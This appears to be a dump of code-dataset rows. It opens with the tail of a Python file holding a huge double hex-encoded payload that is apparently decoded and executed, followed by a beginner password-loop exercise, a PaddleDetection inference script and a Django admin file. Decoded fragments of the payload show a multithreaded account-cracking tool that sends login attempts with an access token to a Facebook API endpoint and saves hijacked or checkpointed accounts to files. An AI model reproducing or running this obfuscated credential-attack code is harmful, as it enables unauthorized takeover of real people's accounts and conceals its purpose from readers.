33333333343330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393336333333373332333733343332333033333434333233303336343633373330333633353336343533323338333233323337333333363331333733363336333533323436333633333336333833363335333633333336343233373330333634363336333933363435333733343332343533373334333733383337333433323332333234333332333033323332333633313332333233323339333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333633333337333233373334333234353337333733373332333633393337333433363335333233383337333533373333333633353337333233323432333233323337343333323332333234323337333033363331333733333337333333333334333234323332333233353433333634353332333233323339333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333633333337333233373334333234353336333333363433333634363337333333363335333233383332333933303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363333333633383336333533363333333634323337333033363436333633393336343533373334333234353336333133373330333733303336333533363435333633343332333833373335333733333336333533373332333234323337333033363331333733333337333333333334333233393330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333633353336343333373333333633353333343133303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933373330333633313337333333373333333333353332333033333434333233303336333233353432333233373336333633363339333733323337333333373334333534363336343533363331333634343336333533323337333534343332333033323432333233303332333733333331333333323333333333333334333333353332333733303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363334333633313337333433363331333233303333343433323330333733353337333233363433333634333336333933363332333234353337333533373332333634333336343633373330333633353336343533323338333233323336333833373334333733343337333033373333333334313332343633323436333633323332343433363331333733303336333933323435333633363336333133363333333633353336333233363436333634363336343233323435333633333336343633363434333234363336343433363335333733343336333833363436333633343332343633363331333733353337333433363338333234353336343333363436333633373336333933363435333334363336333133363333333633333336333533373333333733333335343633373334333634363336343233363335333634353333343433333332333333333333333733333337333333353333333933333339333333303333333933333335333333393333333133333336333333353333333533323335333333323333333533333332333333353333333733343333333333303336333633333331333333343333333033363331333633313336333233363335333633343336333633363332333333363333333533363331333633333333333233333337333633313333333733333333333333393336333533363334333333313336333133333332333333323333333633333333333633323333333133323336333633363336343633373332333634343336333133373334333334343336343133373333333634363336343533323336333733333336333433363432333534363337333633363335333733323337333333363339333634363336343533333434333333323332333633363335333634343336333133363339333634333333343433323332333233303332343233323330333733353337333333363335333733323332333033323432333233303332333233323336333634333336343633363333333633313336343333363335333334343336333533363435333534363335333533353333333233363337333033363331333733333337333333373337333634363337333233363334333334343332333233323330333234323332333033373330333633313337333333373333333333353332333033323432333233303332333233323336333733333336333433363432333334343336333933363436333733333332333633363337333633353336343533363335333733323336333133373334333633353335343633373333333633353337333333373333333633393336343633363435333534363336333333363436333634363336343233363339333633353337333333333434333333313332333633373333333633393336333733333434333333333336333633333335333333353333333533363336333333393333333933363336333633323333333633333331333633363336333333363334333333373336333133363331333333303336333333333334333333343336333633333335333333383336333633333335333333323333333233363335333633363333333633323332333233393330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393337333133323330333334343332333033363431333733333336343633363435333234353336343333363436333633313336333433323338333633343336333133373334333633313332333933303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363339333633363332333033323332333633313336333333363333333633353337333333373333333534363337333433363436333634323336333533363435333233323332333033363339333634353332333033373331333334313330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933373330333733323336333933363435333733343332333033323337333534333337333833333331333633323335343233333331333334323333333333333332333634343335343233353433333733383333333133363332333534323333333133333432333333333333333233363434333533333337333533363333333633333336333533373333333733333336333633373335333634333335343333373338333333313336333233353432333333313333343233333333333333323336343433353434333534333337333833333331333633323335343233333331333334323333333333333330333634343332333033323337333233303332343233323330333733353337333333363335333733323332333033323432333233303332333733323330333534333337333833333331333633323335343233333331333334323333333933333337333634343337343333353433333733383333333133363332333534323333333133333432333333333333333033363434333233303332333733323330333234323332333033373330333633313337333333373333333333353330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363436333634323337333333323435333633313337333033373330333633353336343533363334333233383337333533373333333633353337333233323432333733303336333133373333333733333333333533323339333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333633353336343333373333333633353333343133303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333633393336333633323330333233323337333733373337333733373332343533363336333633313336333333363335333633323336343633363436333634323332343533363333333634363336343433323332333233303336333933363435333233303337333133353432333233323336333533373332333733323336343633373332333534363336343433373333333633373332333233353434333334313330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333733303337333233363339333634353337333433323330333233373335343333373338333333313336333233353432333333313333343233333339333333373336343433353432333534333337333833333331333633323335343233333331333334323333333933333337333634343334333333363338333633353336333333363432333733303336343633363339333634353337333433353433333733383333333133363332333534323333333133333432333333393333333733363434333534343335343333373338333333313336333233353432333333313333343233333339333333373336343433323330333233373332333033323432333233303337333533373333333633353337333233323330333234323332333033323337333233303335343333373338333333313336333233353432333333313333343233333339333333373336343433373433333534333337333833333331333633323335343233333331333334323333333933333337333634343332333033323337333233303332343233323330333733303336333133373333333733333333333533303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393336333333373332333733343332333033333434333233303336343633373330333633353336343533323338333233323337333333363331333733363336333533323436333633333336333833363335333633333336343233373330333634363336333933363435333733343332343533373334333733383337333433323332333234333332333033323332333633313332333233323339333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363333333733323337333433323435333733373337333233363339333733343336333533323338333733353337333333363335333733323332343233323332333734333332333233323432333733303336333133373333333733333333333533323432333233323335343333363435333233323332333933303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393336333333373332333733343332343533363333333634333336343633373333333633353332333833323339333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363333333633383336333533363333333634323337333033363436333633393336343533373334333234353336333133373330333733303336333533363435333633343332333833373335333733333336333533373332333234323337333033363331333733333337333333333335333233393330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363335333634333337333333363335333334313330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333733303336333133373333333733333333333633323330333334343332333033363332333534323332333733363336333633393337333233373333333733343335343633363435333633313336343433363335333233373335343433323330333234323332333033323337333333313333333133333332333333323332333733303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393336333433363331333733343336333133323330333334343332333033373335333733323336343333363433333633393336333233323435333733353337333233363433333634363337333033363335333634353332333833323332333633383337333433373334333733303337333333333431333234363332343633363332333234343336333133373330333633393332343533363336333633313336333333363335333633323336343633363436333634323332343533363333333634363336343433323436333634343336333533373334333633383336343633363334333234363336333133373335333733343336333833323435333634333336343633363337333633393336343533333436333633313336333333363333333633353337333333373333333534363337333433363436333634323336333533363435333334343333333233333333333333373333333733333335333333393333333933333330333333393333333533333339333333313333333633333335333333353332333533333332333333353333333233333335333333373334333333333330333633363333333133333334333333303336333133363331333633323336333533363334333633363336333233333336333333353336333133363333333333323333333733363331333333373333333333333339333633353336333433333331333633313333333233333332333333363333333333363332333333313332333633363336333634363337333233363434333633313337333433333434333634313337333333363436333634353332333633373333333633343336343233353436333733363336333533373332333733333336333933363436333634353333343433333332333233363336333533363434333633313336333933363433333334343332333233323330333234323332333033373335333733333336333533373332333233303332343233323330333233323332333633363433333634363336333333363331333634333336333533333434333633353336343533353436333533353335333333323336333733303336333133373333333733333337333733363436333733323336333433333434333233323332333033323432333233303337333033363331333733333337333333333336333233303332343233323330333233323332333633373333333633343336343233333434333633393336343633373333333233363336333733363335333634353336333533373332333633313337333433363335333534363337333333363335333733333337333333363339333634363336343533353436333633333336343633363436333634323336333933363335333733333333343433333331333233363337333333363339333633373333343433333333333633363333333533333335333333353336333633333339333333393336333633363332333333363333333133363336333633333336333433333337333633313336333133333330333633333333333433333334333633363333333533333338333633363333333533333332333333323336333533363336333333363332333233323339333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933373331333233303333343433323330333634313337333333363436333634353332343533363433333634363336333133363334333233383336333433363331333733343336333133323339333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363339333633363332333033323332333633313336333333363333333633353337333333373333333534363337333433363436333634323336333533363435333233323332333033363339333634353332333033373331333334313330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393337333033373332333633393336343533373334333233303332333733353433333733383333333133363332333534323333333133333432333333333333333233363434333534323335343333373338333333313336333233353432333333313333343233333333333333323336343433353333333733353336333333363333333633353337333333373333333633363337333533363433333534333337333833333331333633323335343233333331333334323333333333333332333634343335343433353433333733383333333133363332333534323333333133333432333333333333333033363434333233303332333733323330333234323332333033373335333733333336333533373332333233303332343233323330333233373332333033353433333733383333333133363332333534323333333133333432333333393333333733363434333734333335343333373338333333313336333233353432333333313333343233333333333333303336343433323330333233373332333033323432333233303337333033363331333733333337333333333336333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333634363336343233373333333234353336333133373330333733303336333533363435333633343332333833373335333733333336333533373332333234323337333033363331333733333337333333333336333233393330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333633353336343333373333333633353333343133303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363339333633363332333033323332333733373337333733373337333234353336333633363331333633333336333533363332333634363336343633363432333234353336333333363436333634343332333233323330333633393336343533323330333733313335343233323332333633353337333233373332333634363337333233353436333634343337333333363337333233323335343433333431333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393337333033373332333633393336343533373334333233303332333733353433333733383333333133363332333534323333333133333432333333393333333733363434333534323335343333373338333333313336333233353432333333313333343233333339333333373336343433343333333633383336333533363333333634323337333033363436333633393336343533373334333534333337333833333331333633323335343233333331333334323333333933333337333634343335343433353433333733383333333133363332333534323333333133333432333333393333333733363434333233303332333733323330333234323332333033373335333733333336333533373332333233303332343233323330333233373332333033353433333733383333333133363332333534323333333133333432333333393333333733363434333734333335343333373338333333313336333233353432333333313333343233333339333333373336343433323330333233373332333033323432333233303337333033363331333733333337333333333336333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393336333333373332333733343332333033333434333233303336343633373330333633353336343533323338333233323337333333363331333733363336333533323436333633333336333833363335333633333336343233373330333634363336333933363435333733343332343533373334333733383337333433323332333234333332333033323332333633313332333233323339333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393336333333373332333733343332343533373337333733323336333933373334333633353332333833373335333733333336333533373332333234323332333233373433333233323332343233373330333633313337333333373333333333363332343233323332333534333336343533323332333233393330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363333333733323337333433323435333633333336343333363436333733333336333533323338333233393330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363333333633383336333533363333333634323337333033363436333633393336343533373334333234353336333133373330333733303336333533363435333633343332333833373335333733333336333533373332333234323337333033363331333733333337333333333336333233393330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393336333533363433333733333336333533333431333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393337333033363331333733333337333333333337333233303333343433323330333633323335343233323337333634333336333133373333333733343335343633363435333633313336343433363335333233373335343433323330333234323332333033323337333333373333333833333336333233373330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363334333633313337333433363331333233303333343433323330333733353337333233363433333634333336333933363332333234353337333533373332333634333336343633373330333633353336343533323338333233323336333833373334333733343337333033373333333334313332343633323436333633323332343433363331333733303336333933323435333633363336333133363333333633353336333233363436333634363336343233323435333633333336343633363434333234363336343433363335333733343336333833363436333633343332343633363331333733353337333433363338333234353336343333363436333633373336333933363435333334363336333133363333333633333336333533373333333733333335343633373334333634363336343233363335333634353333343433333332333333333333333733333337333333353333333933333339333333303333333933333335333333393333333133333336333333353333333533323335333333323333333533333332333333353333333733343333333333303336333633333331333333343333333033363331333633313336333233363335333633343336333633363332333333363333333533363331333633333333333233333337333633313333333733333333333333393336333533363334333333313336333133333332333333323333333633333333333633323333333133323336333633363336343633373332333634343336333133373334333334343336343133373333333634363336343533323336333733333336333433363432333534363337333633363335333733323337333333363339333634363336343533333434333333323332333633363335333634343336333133363339333634333333343433323332333233303332343233323330333733353337333333363335333733323332333033323432333233303332333233323336333634333336343633363333333633313336343333363335333334343336333533363435333534363335333533353333333233363337333033363331333733333337333333373337333634363337333233363334333334343332333233323330333234323332333033373330333633313337333333373333333333373332333033323432333233303332333233323336333733333336333433363432333334343336333933363436333733333332333633363337333633353336343533363335333733323336333133373334333633353335343633373333333633353337333333373333333633393336343633363435333534363336333333363436333634363336343233363339333633353337333333333434333333313332333633373333333633393336333733333434333333333336333633333335333333353333333533363336333333393333333933363336333633323333333633333331333633363336333333363334333333373336333133363331333333303336333333333334333333343336333633333335333333383336333633333335333333323333333233363335333633363333333633323332333233393330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933373331333233303333343433323330333634313337333333363436333634353332343533363433333634363336333133363334333233383336333433363331333733343336333133323339333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393336333933363336333233303332333233363331333633333336333333363335333733333337333333353436333733343336343633363432333633353336343533323332333233303336333933363435333233303337333133333431333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933373330333733323336333933363435333733343332333033323337333534333337333833333331333633323335343233333331333334323333333333333332333634343335343233353433333733383333333133363332333534323333333133333432333333333333333233363434333533333337333533363333333633333336333533373333333733333336333633373335333634333335343333373338333333313336333233353432333333313333343233333333333333323336343433353434333534333337333833333331333633323335343233333331333334323333333333333330333634343332333033323337333233303332343233323330333733353337333333363335333733323332333033323432333233303332333733323330333534333337333833333331333633323335343233333331333334323333333933333337333634343337343333353433333733383333333133363332333534323333333133333432333333333333333033363434333233303332333733323330333234323332333033373330333633313337333333373333333333373330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333634363336343233373333333234353336333133373330333733303336333533363435333633343332333833373335333733333336333533373332333234323337333033363331333733333337333333333337333233393330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363335333634333337333333363335333334313330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333633393336333633323330333233323337333733373337333733373332343533363336333633313336333333363335333633323336343633363436333634323332343533363333333634363336343433323332333233303336333933363435333233303337333133353432333233323336333533373332333733323336343633373332333534363336343433373333333633373332333233353434333334313330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393337333033373332333633393336343533373334333233303332333733353433333733383333333133363332333534323333333133333432333333393333333733363434333534323335343333373338333333313336333233353432333333313333343233333339333333373336343433343333333633383336333533363333333634323337333033363436333633393336343533373334333534333337333833333331333633323335343233333331333334323333333933333337333634343335343433353433333733383333333133363332333534323333333133333432333333393333333733363434333233303332333733323330333234323332333033373335333733333336333533373332333233303332343233323330333233373332333033353433333733383333333133363332333534323333333133333432333333393333333733363434333734333335343333373338333333313336333233353432333333313333343233333339333333373336343433323330333233373332333033323432333233303337333033363331333733333337333333333337333034313330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333633333337333233373334333233303333343433323330333634363337333033363335333634353332333833323332333733333336333133373336333633353332343633363333333633383336333533363333333634323337333033363436333633393336343533373334333234353337333433373338333733343332333233323433333233303332333233363331333233323332333933303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363333333733323337333433323435333733373337333233363339333733343336333533323338333733353337333333363335333733323332343233323332333734333332333233323432333733303336333133373333333733333333333733323432333233323335343333363435333233323332333933303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933363333333733323337333433323435333633333336343333363436333733333336333533323338333233393330343133303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393336333333363338333633353336333333363432333733303336343633363339333634353337333433323435333633313337333033373330333633353336343533363334333233383337333533373333333633353337333233323432333733303336333133373333333733333333333733323339333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033303339333033393330333933303339333033393330343133303339333033393330333933303339333033393330333933303339333033393332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303330343133303339333033393330333933303339333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333233303332333033323330333034313330333933303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303431333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333033393330333933303339333034313330333933303339333633353337333833363333333633353337333033373334333334313330343133303339333033393330333933373330333633313337333333373333333034313330333933303339333034313330333933373330333233303333343433323330333533343336333833373332333633353336333133363334333533303336343633363436333634333332333833333333333333303332333933303431333033393337333033323435333634343336333133373330333233383336343433363331333633393336343533323433333233303336333933363334333233393330343133303339333733303337333233363339333634353337333433323330333233323335343333333330333333333333333333353432333333313333343233333339333333373336343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333233323330343133303339333633383336333133363434333734313336333133323338333233373335343234353332333934333339333333353434333233303335333033373332333634363336333333363335333733333337333333323330333433383336333133373333333233303334333233363335333633353336343533323330333433333336343633363434333733303336343333363335333733343336333533363334333234353332333733323339333034313330333933363338333633313336343433373431333633313332333833323337333534333333333033333333333333333335343233333331333334323333333933333337333634343335343234353332333934333339333333353434333233303334333333363338333633353336333333363432333733303336343633363339333634353337333433323330333433393334333433353333333233303334333833363331333733333332333033343332333633353336333533363435333233303335333333363331333733363336333533363334333234353332333733323339333034313330333933373338333733383332333033333434333233303337333333373334333733323332333833363433333633353336343533323338333634363336343233373333333233393332333933303431333033393337333833373338333733383332333033333434333233303337333333373334333733323332333833363433333633353336343533323338333633333336333833363335333633333336343233373330333634363336333933363435333733343332333933323339333034313330333933373330333733323336333933363435333733343332333033323338333233323335343234353332333934333339333333353434333233303335333433363436333733343336333133363433333233303335343333333330333333333333333333353432333333313333343233333333333333323336343433343436333434323332343633353433333333303333333333333333333534323333333133333432333333393333333733363434333433333335333033323330333334313332333033353433333333303333333333333333333534323333333133333432333333333333333233363434333233323332343233373333333733343337333233323338333634333336333533363435333233383336343633363432333733333332333933323339333234323332333233323436333534333333333033333333333333333335343233333331333334323333333933333337333634343332333233323432333733333337333433373332333233383336343333363335333634353332333833363333333633383336333533363333333634323337333033363436333633393336343533373334333233393332333933323339333034313330333933373330333733323336333933363435333733343332333033323338333333343333333733323431333233323332343433323332333233393330343133303339333034313330333933373332333633313337333733353436333633393336343533373330333733353337333433323338333233323335343333363435333533303337333233363335333733333337333333323330333433353336343533373334333633353337333233323330333533343336343633323330333433323336333133363333333634323332333033323332333233393330343133303339333634343336333533363435333733353332333833323339333033393330343133303339333034313330333933303431333034313336333933363336333233303335343633353436333634353336333133363434333633353335343633353436333233303333343433333434333233303332333733353436333534363336343433363331333633393336343533353436333534363332333733333431333034313330333933363434333633353336343533373335333233383332333933303431333034313330343133303431323732393239272929'))
| 12,622.5 | 100,811 | 0.999445 |
4a212a6a318511798288c6d8f02512e0c9f097be | 117 | py | Python | Python/Iniciante/1114.py | TiagoSanti/uri-solutions | e80d9e2874cac13e721a96d7aeb075e7d72ceb2d | [
"MIT"
] | null | null | null | Python/Iniciante/1114.py | TiagoSanti/uri-solutions | e80d9e2874cac13e721a96d7aeb075e7d72ceb2d | [
"MIT"
] | null | null | null | Python/Iniciante/1114.py | TiagoSanti/uri-solutions | e80d9e2874cac13e721a96d7aeb075e7d72ceb2d | [
"MIT"
] | null | null | null | key = int(input())
while key != 2002:
print('Senha Invalida')
key = int(input())
print('Acesso Permitido') | 14.625 | 27 | 0.615385 |
4a212ad6b385fbc5e10dd8e04a8934645c3bd689 | 9,392 | py | Python | PaddleCV/PaddleDetection/slim/infer.py | Qinyinmm/models | 83d4799028eba4568e7c193ded297d1dfc3279a3 | [
"Apache-2.0"
] | 1 | 2021-09-08T13:27:19.000Z | 2021-09-08T13:27:19.000Z | PaddleCV/PaddleDetection/slim/infer.py | Qinyinmm/models | 83d4799028eba4568e7c193ded297d1dfc3279a3 | [
"Apache-2.0"
] | null | null | null | PaddleCV/PaddleDetection/slim/infer.py | Qinyinmm/models | 83d4799028eba4568e7c193ded297d1dfc3279a3 | [
"Apache-2.0"
] | 1 | 2021-07-29T06:43:01.000Z | 2021-07-29T06:43:01.000Z | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import glob
import numpy as np
from PIL import Image
sys.path.append("../../")
def set_paddle_flags(**kwargs):
for key, value in kwargs.items():
if os.environ.get(key, None) is None:
os.environ[key] = str(value)
# NOTE(paddle-dev): All of these flags should be set before
# `import paddle`. Otherwise, it would not take any effect.
set_paddle_flags(
FLAGS_eager_delete_tensor_gb=0, # enable GC to save memory
)
from paddle import fluid
from ppdet.utils.cli import print_total_cfg
from ppdet.core.workspace import load_config, merge_config, create
from ppdet.modeling.model_input import create_feed
from ppdet.data.data_feed import create_reader
from ppdet.utils.eval_utils import parse_fetches
from ppdet.utils.cli import ArgsParser
from ppdet.utils.check import check_gpu
from ppdet.utils.visualizer import visualize_results
import ppdet.utils.checkpoint as checkpoint
import logging
FORMAT = '%(asctime)s-%(levelname)s: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
logger = logging.getLogger(__name__)
def get_save_image_name(output_dir, image_path):
"""
Get save image name from source image path.
"""
if not os.path.exists(output_dir):
os.makedirs(output_dir)
image_name = os.path.split(image_path)[-1]
name, ext = os.path.splitext(image_name)
return os.path.join(output_dir, "{}".format(name)) + ext
def get_test_images(infer_dir, infer_img):
"""
Get image path list in TEST mode
"""
assert infer_img is not None or infer_dir is not None, \
"--infer_img or --infer_dir should be set"
assert infer_img is None or os.path.isfile(infer_img), \
"{} is not a file".format(infer_img)
assert infer_dir is None or os.path.isdir(infer_dir), \
"{} is not a directory".format(infer_dir)
images = []
# infer_img has a higher priority
if infer_img and os.path.isfile(infer_img):
images.append(infer_img)
return images
infer_dir = os.path.abspath(infer_dir)
assert os.path.isdir(infer_dir), \
"infer_dir {} is not a directory".format(infer_dir)
exts = ['jpg', 'jpeg', 'png', 'bmp']
exts += [ext.upper() for ext in exts]
for ext in exts:
images.extend(glob.glob('{}/*.{}'.format(infer_dir, ext)))
assert len(images) > 0, "no image found in {}".format(infer_dir)
logger.info("Found {} inference images in total.".format(len(images)))
return images
def main():
cfg = load_config(FLAGS.config)
if 'architecture' in cfg:
main_arch = cfg.architecture
else:
raise ValueError("'architecture' not specified in config file.")
merge_config(FLAGS.opt)
# check if set use_gpu=True in paddlepaddle cpu version
check_gpu(cfg.use_gpu)
# print_total_cfg(cfg)
if 'test_feed' not in cfg:
test_feed = create(main_arch + 'TestFeed')
else:
test_feed = create(cfg.test_feed)
test_images = get_test_images(FLAGS.infer_dir, FLAGS.infer_img)
test_feed.dataset.add_images(test_images)
place = fluid.CUDAPlace(0) if cfg.use_gpu else fluid.CPUPlace()
exe = fluid.Executor(place)
infer_prog, feed_var_names, fetch_list = fluid.io.load_inference_model(
dirname=FLAGS.model_path, model_filename=FLAGS.model_name,
params_filename=FLAGS.params_name,
executor=exe)
reader = create_reader(test_feed)
feeder = fluid.DataFeeder(place=place, feed_list=feed_var_names,
program=infer_prog)
# parse infer fetches
assert cfg.metric in ['COCO', 'VOC'], \
"unknown metric type {}".format(cfg.metric)
extra_keys = []
if cfg['metric'] == 'COCO':
extra_keys = ['im_info', 'im_id', 'im_shape']
if cfg['metric'] == 'VOC':
extra_keys = ['im_id', 'im_shape']
keys, values, _ = parse_fetches({'bbox':fetch_list}, infer_prog, extra_keys)
# parse dataset category
if cfg.metric == 'COCO':
from ppdet.utils.coco_eval import bbox2out, mask2out, get_category_info
if cfg.metric == "VOC":
from ppdet.utils.voc_eval import bbox2out, get_category_info
anno_file = getattr(test_feed.dataset, 'annotation', None)
with_background = getattr(test_feed, 'with_background', True)
use_default_label = getattr(test_feed, 'use_default_label', False)
clsid2catid, catid2name = get_category_info(anno_file, with_background,
use_default_label)
# whether output bbox is normalized in model output layer
is_bbox_normalized = False
# use tb-paddle to log image
if FLAGS.use_tb:
from tb_paddle import SummaryWriter
tb_writer = SummaryWriter(FLAGS.tb_log_dir)
tb_image_step = 0
tb_image_frame = 0 # each frame can display ten pictures at most.
imid2path = reader.imid2path
keys = ['bbox']
for iter_id, data in enumerate(reader()):
feed_data = [[d[0], d[1]] for d in data]
outs = exe.run(infer_prog,
feed=feeder.feed(feed_data),
fetch_list=fetch_list,
return_numpy=False)
res = {
k: (np.array(v), v.recursive_sequence_lengths())
for k, v in zip(keys, outs)
}
res['im_id'] = [[d[2] for d in data]]
logger.info('Infer iter {}'.format(iter_id))
bbox_results = None
mask_results = None
if 'bbox' in res:
bbox_results = bbox2out([res], clsid2catid, is_bbox_normalized)
if 'mask' in res:
mask_results = mask2out([res], clsid2catid,
model.mask_head.resolution)
# visualize result
im_ids = res['im_id'][0]
for im_id in im_ids:
image_path = imid2path[int(im_id)]
image = Image.open(image_path).convert('RGB')
# use tb-paddle to log original image
if FLAGS.use_tb:
original_image_np = np.array(image)
tb_writer.add_image(
"original/frame_{}".format(tb_image_frame),
original_image_np,
tb_image_step,
dataformats='HWC')
image = visualize_results(image,
int(im_id), catid2name,
FLAGS.draw_threshold, bbox_results,
mask_results)
# use tb-paddle to log image with bbox
if FLAGS.use_tb:
infer_image_np = np.array(image)
tb_writer.add_image(
"bbox/frame_{}".format(tb_image_frame),
infer_image_np,
tb_image_step,
dataformats='HWC')
tb_image_step += 1
if tb_image_step % 10 == 0:
tb_image_step = 0
tb_image_frame += 1
save_name = get_save_image_name(FLAGS.output_dir, image_path)
logger.info("Detection bbox results save in {}".format(save_name))
image.save(save_name, quality=95)
if __name__ == '__main__':
parser = ArgsParser()
parser.add_argument(
"--infer_dir",
type=str,
default=None,
help="Directory for images to perform inference on.")
parser.add_argument(
"--infer_img",
type=str,
default=None,
help="Image path, has higher priority over --infer_dir")
parser.add_argument(
"--output_dir",
type=str,
default="output",
help="Directory for storing the output visualization files.")
parser.add_argument(
"--draw_threshold",
type=float,
default=0.5,
help="Threshold to reserve the result for visualization.")
parser.add_argument(
"--use_tb",
type=bool,
default=False,
help="whether to record the data to Tensorboard.")
parser.add_argument(
'--tb_log_dir',
type=str,
default="tb_log_dir/image",
help='Tensorboard logging directory for image.')
parser.add_argument(
'--model_path',
type=str,
default=None,
help="inference model path")
parser.add_argument(
'--model_name',
type=str,
default='__model__.infer',
help="model filename for inference model")
parser.add_argument(
'--params_name',
type=str,
default='__params__',
help="params filename for inference model")
FLAGS = parser.parse_args()
main()
| 33.906137 | 80 | 0.627449 |
4a212af2372d76702b01259a5bc996b4cdcfd600 | 234 | py | Python | gateway/admin.py | RockefellerArchiveCenter/ProjectElectronAPIGateway | 4a35c24fe5c09df4f849d1f74b45af5a49c61ac6 | [
"MIT"
] | null | null | null | gateway/admin.py | RockefellerArchiveCenter/ProjectElectronAPIGateway | 4a35c24fe5c09df4f849d1f74b45af5a49c61ac6 | [
"MIT"
] | null | null | null | gateway/admin.py | RockefellerArchiveCenter/ProjectElectronAPIGateway | 4a35c24fe5c09df4f849d1f74b45af5a49c61ac6 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Application, RequestLog, ServiceRegistry, Source
admin.site.register(Application)
admin.site.register(ServiceRegistry)
admin.site.register(Source)
admin.site.register(RequestLog)
| 26 | 68 | 0.837607 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.